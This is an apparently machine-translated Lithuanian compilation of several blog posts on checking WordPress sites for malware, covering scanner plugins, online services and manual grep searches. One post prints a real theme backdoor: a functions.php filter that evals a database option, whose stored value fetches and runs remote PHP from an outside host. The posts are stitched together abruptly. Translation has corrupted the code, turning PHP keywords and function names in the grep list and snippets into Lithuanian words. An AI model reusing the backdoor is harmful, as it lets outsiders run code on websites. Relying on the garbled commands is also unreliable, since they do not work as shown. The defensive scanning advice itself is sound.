WordPress yra populiariausias įvairių informacinių svetainių ir tinklaraščių kūrimo variklis. Jūsų svetainės saugumas yra daugiau nei jūsų duomenų saugumas. Tai daug svarbiau, nes tai taip pat yra visų vartotojų, kurie skaito ir pasitiki jūsų šaltiniu, saugumas. Štai kodėl taip svarbu, kad svetainė nebūtų užkrėsta virusais ar kitu kenkėjišku kodu.

Viename iš šių straipsnių apžvelgsime, kaip apsaugoti „WordPress“ nuo įsilaužimo, tačiau dabar noriu jums pasakyti, kaip patikrinti, ar „WordPress“ svetainėje nėra virusų ir kenkėjiško kodo, kad įsitikintumėte, jog viskas yra saugu.

Pirmas variantas, kuris ateina į galvą, yra tai, kad buvote įsilaužę įsilaužėlių ir į savo svetainės kodą įdėjote užpakalines duris, kad galėtumėte siųsti šlamštą, įdėti nuorodas ir kitus blogus dalykus. Taip nutinka kartais, tačiau tai yra gana retas atvejis, jei programinę įrangą atnaujinate laiku.

Yra tūkstančiai nemokamų „WordPress“ temų ir įvairių papildinių, ir tai jau gali kelti grėsmę. Vienas dalykas, kai atsisiunčiate šabloną iš „WordPress“ svetainės, ir visai kas kita, kai jį randate kairėje svetainėje. Nesąžiningi kūrėjai į savo produktus gali įterpti įvairius kenkėjiškus kodus. Rizika dar didesnė, jei nemokamai atsisiunčiate aukščiausios kokybės šablonus, kur įsilaužėliai, niekuo nerizikuodami, gali pridėti tam tikrą saugumo spragą, pro kurią jie gali prasiskverbti ir padaryti tai, ko reikia. Štai kodėl taip svarbu patikrinti, ar „WordPress“ svetainėje nėra virusų.

Tikrinama, ar „WordPress“ svetainėje nėra virusų

Pirmas dalykas, į kurį reikia kreiptis tikrinant svetainę, nėra virusai, tai yra „WordPress“ papildiniai. Greitai ir paprastai galite nuskaityti savo svetainę ir rasti įtartinas kodo sritis, į kurias verta atkreipti dėmesį, nesvarbu, ar jos yra temoje, papildinyje ar pačiame pagrindiniame Wodpress. Pažvelkime į kelis populiariausius papildinius:

1.TOC

Šis labai paprastas papildinys patikrina visas svetainėje įdiegtas temas, ar jose nėra kenkėjiško kodo. Papildinys aptinka paslėptas nuorodas, užšifruotas naudojant base64 kodo įterpimą, taip pat rodo išsamią informaciją apie rastas problemas. Dažniausiai aptiktos kodo dalys nėra virusai, tačiau gali būti potencialiai pavojingi, todėl turėtumėte į jas atkreipti dėmesį.

Atviras "Išvaizda" -> "TAC" tada palaukite, kol visos temos bus patikrintos.

2. VIP skaitytuvas

Labai panašus į TOC temų skaitytuvą, bet rodo išsamesnę informaciją. Tos pačios galimybės aptikti nuorodas, paslėptą kodą ir kitus kenkėjiškus intarpus. Tiesiog atidarykite VIP skaitytuvo elementą įrankių skiltyje ir išanalizuokite rezultatą.

Gali pakakti ištrinti nereikalingus failus, pavyzdžiui, desktop.ini. Arba reikia išsamiau pažiūrėti, kas vyksta failuose naudojant base64.

3. Anti-Malware iš GOTMLS.NET

Šis papildinys leidžia ne tik nuskaityti svetainės temas ir šerdį, ar nėra virusų, bet ir apsaugoti svetainę nuo žiaurios jėgos slaptažodžių bei įvairių XSS, SQLInj atakų. Paieška atliekama pagal žinomus parašus ir pažeidžiamumą. Kai kuriuos pažeidžiamumus galima pataisyti vietoje. Norėdami pradėti nuskaityti failus, atidarykite „Anti-Malvare“šoniniame meniu ir spustelėkite „Paleisti nuskaitymą“:

Kad galėtumėte paleisti nuskaitymą, turite atnaujinti parašų duomenų bazes.

4. Wordfence

Tai vienas populiariausių „WordPress“ saugos ir kenkėjiškų programų nuskaitymo papildinių. Be skaitytuvo, kuris gali rasti daugumą žymių WordPress kode, yra nuolatinė apsauga nuo įvairių tipų atakų ir slaptažodžių brutalios jėgos. Paieškos metu įskiepis randa galimas problemas su įvairiais įskiepiais ir temomis bei praneša apie poreikį atnaujinti WordPress.

Atidarykite skirtuką „WPDefence“šoniniame meniu ir eikite į skirtuką "Nuskaityti" ir paspauskite "Pradėti nuskaitymą":

Nuskaitymas gali šiek tiek užtrukti, bet baigę pamatysite išsamią rastų problemų ataskaitą.

5. Antivirusinė

Tai dar vienas paprastas papildinys, kuris nuskaitys jūsų svetainės šabloną, ar nėra kenkėjiško kodo. Trūkumas yra tas, kad nuskaitomas tik dabartinis šablonas, tačiau informacija rodoma pakankamai išsamiai. Pamatysite visas pavojingas funkcijas, kurios yra temoje, ir galėsite išsamiai išanalizuoti, ar jos nekelia pavojų. Raskite prekę "Antivirus" nustatymuose ir spustelėkite „Nuskaityti temų šablonus dabar“:

6. Vientisumo tikrintuvas

Taip pat patartina patikrinti WordPress failų vientisumą, jei virusas jau kur nors užsirašė. Tam galite naudoti Integrity Checker papildinį. Jis tikrina visus pagrindinius, papildinių ir šablonų failus, ar nėra pakeitimų. Nuskaitymo pabaigoje pamatysite informaciją apie pakeistus failus.

Internetinės paslaugos

Taip pat yra keletas internetinių paslaugų, kurios leidžia patikrinti, ar „WordPress“ svetainėje nėra virusų, arba patikrinti tik šabloną. Štai keletas iš jų:

themecheck.org- atsisiunčiate temų archyvą ir matote visus įspėjimus apie jame naudojamas galimas kenkėjiškas funkcijas. Galite ne tik peržiūrėti informaciją apie savo temą, bet ir apie kitas kitų vartotojų įkeltas temas, taip pat skirtingas temos versijas. Kad ir ką randa papildiniai, galite rasti šioje svetainėje. Taip pat labai svarbu patikrinti „WordPress“ temą.

virustotal.com- gerai žinomas šaltinis, kuriame galite patikrinti, ar svetainėje ar šablono faile nėra virusų.

ReScan.pro- WordPress svetainės nuskaitymas dėl virusų naudojant šią paslaugą yra nemokamas; atliekama statinė ir dinaminė analizė siekiant aptikti galimus peradresavimus; skaitytuvas atidaro svetainės puslapius. Tikrina svetainę pagal įvairius juoduosius sąrašus.

sitecheck.sucuri.net- paprasta paslauga, skirta nuskaityti svetaines ir temas dėl virusų. Yra „WordPress“ papildinys. Aptinka pavojingas nuorodas ir scenarijus.

Rankinis patikrinimas

Nieko negali būti geriau už rankinį patikrinimą. Linux turi šią nuostabią grep programą, leidžiančią ieškoti atsitiktinių eilučių aplanke su failais. Belieka suprasti, ko mes ieškosime:

eval - ši funkcija leidžia vykdyti savavališką PHP kodą, jo nenaudoja save gerbiantys produktai; jei vienas iš įskiepių ar temos naudoja šią funkciją, yra beveik 100% tikimybė, kad jame yra virusas;

• base64_decode- šifravimo funkcijas galima naudoti kartu su eval, norint paslėpti kenkėjišką kodą, tačiau jos gali būti naudojamos ir taikiems tikslams, todėl būkite atsargūs;
• sha1- kitas kenkėjiško kodo šifravimo būdas;
• gzinflate- suspaudimo funkcija, tie patys tikslai, kartu su eval, pavyzdžiui, gzinflate(base64_decode(kodas);
• strrev- pasuka eilutę atgal ne anksčiau, nes primityviam šifravimui gali būti naudojama parinktis;
• spausdinti- išveda informaciją į naršyklę, kartu su gzinflate arba base64_decode yra pavojinga;
• failo_įdėjimo_turinys- Pati WordPress arba papildiniai vis tiek gali sukurti failus failų sistemoje, tačiau jei tema tai daro, turėtumėte būti atsargūs ir patikrinti, kodėl ji taip daro, nes gali būti įdiegta virusų;
• file_get_contents- dažniausiai naudojamas taikiems tikslams, tačiau gali būti naudojamas kenkėjiškam kodui parsisiųsti arba informacijai iš failų nuskaityti;
• garbanoti- ta pati istorija;
• fopenas- atidaro failą rašymui, niekada nežinai, kokiu tikslu;
• sistema- funkcija vykdo komandą Linux sistemoje, jei tai daro pats tema, papildinys ar wordpress, greičiausiai ten yra virusas;
• simbolinė nuoroda- sukuria simbolines nuorodas sistemoje, galbūt virusas bando padaryti pagrindinę failų sistemą prieinamą iš išorės;
• kopija- kopijuoja failą iš vienos vietos į kitą;
• getcwd- grąžina esamo darbo katalogo pavadinimą;
• cwd- pakeičia esamą darbo aplanką;
• ini_get- gauna informaciją apie PHP nustatymus, dažnai taikiais tikslais, bet niekada negali žinoti;
• error_reporting(0)- išjungia bet kokių klaidų pranešimų išvedimą;
• window.top.location.href- javascript funkcija, naudojama peradresavimui į kitus puslapius;
• nulaužtas- Taigi, tik tuo atveju, mes patikriname, staiga įsilaužėlis nusprendė mums pasakyti.

Kiekvieną atskirą žodį galite pakeisti tokia komanda:

grep -R "nulaužtas" /var/www/path/to/files/wordpress/wp-content/

Arba naudokite paprastą scenarijų, kuris ieškos visų žodžių vienu metu:

value="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
kopija (
eval (
sistema (
simbolinė nuoroda (
error_reporting(0)
spausdinti
file_get_contents(
file_put_contents(
fopen (
nulaužtas"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

Sveiki, draugai. Ar esate tikri, kad nemokamas „WordPress“ šablonas, kurį naudojate savo svetainėms ir tinklaraščiams, yra tikrai saugus ir jame nėra paslėptų grėsmių ar kenkėjiško kodo? Ar esate visiškai tuo tikras? Tikrai?)

Manote, kad paleidote šabloną, pašalinote iš jo paslėptas nuorodas ir darbas atliktas. Reguliariai nuskaitote svetainės failus naudodami antivirusinę programą, peržiūrėkite „Yandex“ žiniatinklio valdytojo įrankius skirtuke „Sauga“ ir jaučiatės palengvėję, kai pamatysite pranešimą: „ Kenkėjiško kodo svetainėje neaptikta«.

Taip ir as galvojau. Nenorėčiau tavęs nuliūdinti, bet...

Paslėptas pavojingas kodas nemokamuose „WordPress“ šablonuose

Tai laišką, kurį praėjusią savaitę gavau el. paštu iš savo prieglobos įmonės. Neseniai jie pradėjo reguliariai tikrinti visus svetainės failus, kad ieškotų kenkėjiško turinio, ir jie rado šį turinį pas mane!

Viskas prasidėjo, kai vieną popietę nuėjau į savo svetainę ir negalėjau jos paleisti – pasirodė įžeidžiantis pranešimas apie tai, kad failai su plėtiniu php nerasta. Šiek tiek įsitempęs nuėjau patyrinėti aplanko su prieglobos svetaine turinio ir iškart aptikau problemą – mano šablono failas fuctions.php buvo pervadintas į functions.php.malware, o tai tarsi dviprasmiškai užsiminė – buvo antivirusinė programa. dirbu čia ar panašiai) Nuėjęs į paštą radau aukščiau pateiktą prieglobos šeimininko ataskaitą.

Pirmiausia, žinoma, pradėjau tikrinti šį failą, tyrinėti jo turinį, nuskaityti su visokiomis antivirusinėmis programomis, dešimtimis internetinių virusų tikrinimo paslaugų ir pan. — galiausiai nieko nerasta, visi vienbalsiai tvirtino, kad byla visiškai saugi. Žinoma, aš išreiškiau savo abejones šeimininkui, sakydamas, kad kažką supainiojote, bet tik tuo atveju paprašiau pateikti ataskaitą apie kenkėjiškos kodo dalies aptikimą.

Ir štai ką jie man atsakė

Nuėjau į google informaciją apie šį kodą ir rimtai pagalvojau...

Kaip šablone rasti kenkėjiško kodo dalį

Kaip paaiškėjo, tai tikrai nebanali technika, leidžianti suinteresuotoms šalims perduoti duomenis į jūsų svetainę ir keisti puslapių turinį be jūsų žinios! Jei naudojate nemokamą šabloną, tada Labai rekomenduoju patikrinti, ar funkcijos.php yra toks kodas:

add_filter('the_content', '_bloginfo', 10001);
funkcija _bloginfo($content)(
pasaulinis $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
grąžinti $ co;
) else return $content;
}

Net ir turint labai menkas PHP žinias, aišku, kad kuriamas tam tikras filtras, susietas su visuotiniu kintamuoju įrašu ir turiniu, kurie yra atsakingi už turinio rodymą tik tinklaraščio įrašų puslapiuose (sąlyga is_single). Jau įtartina, ar ne? Na, o dabar pažiūrėkime, koks šis kodas bus rodomas mūsų svetainėje.

Duomenų bazėje prašoma įdomi parinktis „Blogoption“ taip pat atrodo labai įtartinai. Einame į savo MySQL duomenų bazę ir ten randame lentelę, vadinamą wp_options, jei nepakeitėte priešdėlių, pagal numatytuosius nustatymus ji atrodys taip. Ir joje randame mus dominančią eilutę, vadinamą blogoption

Koks grožis! Matome tokią parinktį

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Tie. Iš tam tikros svetainės (ir rusiškos, atminkite) jie grąžina turinį, kuriame gali būti bet kas! Bet koks nuorodų skaičius, kenkėjiški kodai, pakeistas tekstas ir kt. Kai prisijungiate prie pačios svetainės, pateikiama 403 prieigos klaida, o tai nenuostabu. Žinoma, šią parinktį taip pat pašalinau iš duomenų bazės.

Remiantis nukentėjusiųjų informacija, tikslus jūsų straipsnio turinys paprastai grąžinamas tik vienu pakeitimu - vietoj bet kurio taško „“. atvira nuoroda buvo paslėpta tekste! Ir, beje, ši parinktis įrašoma į duomenų bazę, kai įdiegiamas pats šablonas, o tada sėkmingai tai darantis kodas savaime sunaikinamas. Ir aš gyvenau su tokiomis šiukšlėmis dvejus metus ir per visą tą laiką man šios grėsmės nenustatė nei viena antivirusinė, nei paslauga. Tiesą sakant, nepastebėjau, ar šis triukas man kada nors pasiteisino, ar mano saugos įskiepis užblokavo šią funkciją (o gal vienas iš „WordPress“ atnaujinimų uždarė šią spragą), bet vis tiek nemalonu.

Moralas apie nemokamą sūrį

Kaip jums patinka mūsų šablonų „vertėjų“ (arba tų, kurie skelbia juos savo kataloguose) rafinuotumas? Tai ne jums, kad iškirptumėte nuorodas iš poraštės) Gaila, kad nepamenu, iš kur atsisiunčiau savo šabloną, tai buvo seniai, kitaip tikrai būčiau parašęs keletą meilių. Ir jei tuo metu turėčiau tą pačią patirtį, kurią turiu dabar, tikrai nebūčiau naudojęs nemokamo šablono arba, kraštutiniais atvejais, neatsisiųsčiau jo iš nežinomų šaltinių!

Lengviau nusipirkti kokį oficialų premium šabloną už 15-20 dolerių ir gyventi ramiai, žinant, kad jame nėra jokių skylių ar šifruotų nuorodų, o net jei yra pažeidžiamumų, kūrėjai tikrai išleis atnaujinimą, kuriame šios skylės bus uždaryta. ( Beje, Artemas neseniai paskelbė straipsnį, kuriame kalba apie aukščiausios kokybės šablonus ir netgi dalija reklaminius kodus, skirtas žiaurioms nuolaidoms tiems, kurie domisi.)

Sveiki IdeaFox draugai!

Nežinau kaip jūs, bet man sunku užmigti naktimis. Mane kankina tinklaraščio saugumo problemos. nebeturiu jėgų :-)

Perskaičiau daugybę tinklaraščių šia tema ir išbandžiau daugybę įskiepių, kurie padeda išspręsti šią problemą. Ir komentaruose jie pradėjo klausinėti svetainės apsaugos tema, kuri paskatino mane parašyti šią pastabą.

Įsivaizduokite, kad rašote dienoraštį, rašote straipsnius, bandote... Ir ateina pikti asilai ir sulaužo jūsų svetainę. Manau, bus daug sielvarto.

Juk kiekvienas normalus tinklaraštininkas daug laiko ir pastangų investuoja į savo svetainės kūrimą. Ir daugeliui dienoraščio rašymas apskritai tampa manija... Čia ir iki tol, jei TAI atsitiks :-)

Na, jūs suprantate, kaip tai svarbu.

Pagaliau kimbam prie reikalo :)

Prieš porą mėnesių jau rašiau pastabą apie įsilaužimą. Būtinai perskaitykite. Tačiau nuo to laiko praėjo gana daug laiko ir aš ėmiausi papildomų priemonių visapusei gynybai stiprinti.

Tolesnėse pastabose aš tikrai išsamiai aptarsiu šį klausimą. (Aš taip pat prisimenu ir rašau apie IPT nustatymus)

3. Patikrinkite svetainę kitose internetinėse paslaugose

Tokių paslaugų netrūksta. Turiu tvirtą nuomonę, kad daugelis jų yra visiškai kvaili ir sukurti tik reklamai rodyti.

Daktaras Web

Kompanija DR.Web padarė gerą internetinių svetainių tikrinimo paslaugą. Asmeniškai jis kartą padėjo man rasti infekciją draugo tinklaraštyje (.htaccess faile buvo trečiosios šalies kodas)

Patikra labai paprasta. Įveskite savo URL ir palaukite patvirtinimo rezultato.

antivirus-alarm.ru

Galingas svetainių skaitytuvas, kuris naudoja net 43 antivirusines duomenų bazes iš pirmaujančių pasaulyje antivirusinių kompanijų.

Čia taip pat viskas labai paprasta. Įvedame savo svetainės URL ir sulaikę kvapą laukiame nuskaitymo rezultatų.

Aš laukiau šių.

Viskas švaru, galima ramiai miegoti :)

Visa tai, žinoma, gerai, tačiau taip pat reikia įdiegti keletą papildinių, kurie visiškai nepakenks „WordPress“ tinklaraščiams.

4. Paprašykite šeimininko patikrinti jūsų svetainę

Faktas yra tas, kad prieglobos teikėjai dar labiau susirūpinę dėl saugumo problemų nei jūs ir turi galingų saugumo priemonių. Be to, naudojant specialias apsaugos priemones.

Šią naujieną turiu jums šiandien. Toliau papasakosiu apie labai galingą papildinį, kuris gali žymiai apsaugoti jūsų „WordPress“ tinklaraštį nuo įsilaužimo.

Aš jau dirbu su juo 2 mėnesius ir esu juo labai patenkintas. Kol sugalvojau, 3 kartus užsibandžiau: –) Žodžiu, yra ką papasakoti.

Vienas iš svarbiausių žingsnių kuriant tinklaraštį yra kokybiško šablono pasirinkimas. Yra daug svetainių, tiek mokamų, tiek nemokamų. Tačiau čia reikia būti atsargiems, nes kartu su failu yra didelė tikimybė gauti virusų, kenkėjiškų scenarijų ir paslėptų nuorodų.

Bet net jei šablonas yra švarus saugumo požiūriu ir esate visiškai patenkintas jo dizainu, patogumu ir funkcionalumu, tai nereiškia, kad viskas tvarkoje. Tema turi turėti galiojantį HTML ir CSS kodą, taip pat atitikti visus WordPress TVS standartus. Net mokamos temos ir pagal užsakymą pagaminti šablonai turi problemų dėl pastarųjų.

Variklių kūrėjai nuolat jį tobulina, o šablonų autoriai ne visada su jais neatsilieka, kurdami naudoja pasenusias funkcijas.

Šiandien parodysiu 2 būdus, kaip patikrinti, ar „WordPress“ temos atitinka standartus. Šie įrankiai naudojami, kai jie pridedami prie oficialaus katalogo https://wordpress.org/themes/

„WordPress“ temų ir „Joomla“ šablonų atitikties standartams tikrinimo paslauga

ThemeCheck.org yra nemokama paslauga, leidžianti patikrinti TVS „WordPress“ ir „Joomla“ šablonų saugumą ir kokybę prieš įdiegiant juos į savo svetainę.

Norėdami patikrinti temą, atsisiųskite jos archyvą iš savo kompiuterio spustelėdami mygtuką „Pasirinkti failą“, esantį themecheck.org. Jei nenorite, kad nuskaitymo rezultatai būtų išsaugoti paslaugoje ir būtų pasiekiami kitiems vartotojams, pažymėkite „ Pamirškite įkeltus duomenis po rezultatų“. Dabar spustelėkite mygtuką „Pateikti“.

Pavyzdžiui, aš paėmiau temą Sąsaja, kurį atsisiunčiau iš oficialios svetainės. 99 iš 100 – 0 kritinių klaidų ir 1 įspėjimas. Tai labai geras rezultatas.

Palyginimui, mano tinklaraščio šablonas gavo 0 balų (14 klaidų ir 23 įspėjimai). Manau, kad daugeliui rezultatai nelabai skirsis, ypač jei temos jau pasenusios. Visi užrašai su paaiškinimais, nurodant failus ir eilutes, kur jie buvo rasti, yra tame pačiame puslapyje žemiau.

Atvirai pasakius, aš ten daug ko nesupratau, tai būtų naudingiau autoriams, o man lengviau pakeisti šabloną nei viską sutvarkyti. Tik nežinau, kada nuspręsiu tai padaryti.

Pagrindiniame puslapyje yra didelis anksčiau išbandytų „WordPress“ ir „Joomla“ žiniatinklio temų pasirinkimas su galimybe rūšiuoti pagal pridėjimo laiką arba įvertinimą. Spustelėję juos, galite pamatyti išsamią informaciją ir nuorodas į autoriaus svetainę ir atsisiuntimo puslapį.

Jei esate kūrėjas ir jūsų tema yra 100% tinkama, galite apie tai informuoti vartotojus įdėdami specialų ženklelį su įvertinimu.

ThemeCheck.org paslaugos vertė yra ta, kad bet kuris žiniatinklio valdytojas gali ją naudoti, kad pasirinktų aukštos kokybės temą prieš įdiegdamas ją į tinklaraštį.

Temos tikrinimo papildinys

Galite patikrinti jau įdiegto šablono suderinamumą su naujausiais „WordPress“ standartais naudodami „Theme Check“ papildinį. Naujausios versijos atsisiuntimo nuoroda: https://wordpress.org/plugins/theme-check/

Papildinio funkcionalumas yra panašus į aukščiau aprašytą paslaugą. Po standartinio įdiegimo ir aktyvinimo nereikia atlikti jokių nustatymų. Patikrinimo procedūra:

1. Eikite į administratoriaus skydelį į meniu puslapį „Išvaizda“ – „Temos patikrinimas“.
2. Išskleidžiamajame sąraše pasirinkite norimą temą, jei įdiegėte kelias.
3. Jei nenorite siųsti informacijos, pažymėkite langelį „Suppress INFO“.
4. Spustelėkite mygtuką „Patikrinti“.

Rezultatai bus rodomi tame pačiame puslapyje.

Kaip matote, standartinė tema Dvidešimt dešimt Tai irgi nėra idealu, bet pvz. Dvidešimt keturiolika klaidų neturi.

Patikrinus papildinį galima išjungti arba, dar geriau, visiškai pašalinti iki kito karto.

Išvada. Prieš diegdami naują „WordPress“ šabloną, patikrinkite, ar jame nėra paslėptų nuorodų ir kenkėjiško kodo, naudodami TAC įskiepį, bet ir „ThemeCheck.org“ paslaugą arba „Theme Check“ papildinį, ar jis atitinka naujausius TVS standartus.

P.S. Neseniai naršydamas TopSape Reader pamačiau naują SEO tinklaraštį zenpr.ru, kuris užima 1 vietą tarp tinklaraštininkų pagal paspaudimų skaičių per mėnesį. Atsižvelgiant į tai, kad jam kiek daugiau nei mėnuo, rezultatas vertas pagarbos. Dizainas minimalizmo stiliaus, jei nesakyčiau, kad jo išvis nėra, bet autorė rašo – perskaitysite. Viskas iki taško ir be vandens. Kaip ir tinklaraščio pavadinime – „nulis papildomų simbolių“. Rekomenduoju perskaityti, rasite daug naudingos informacijos.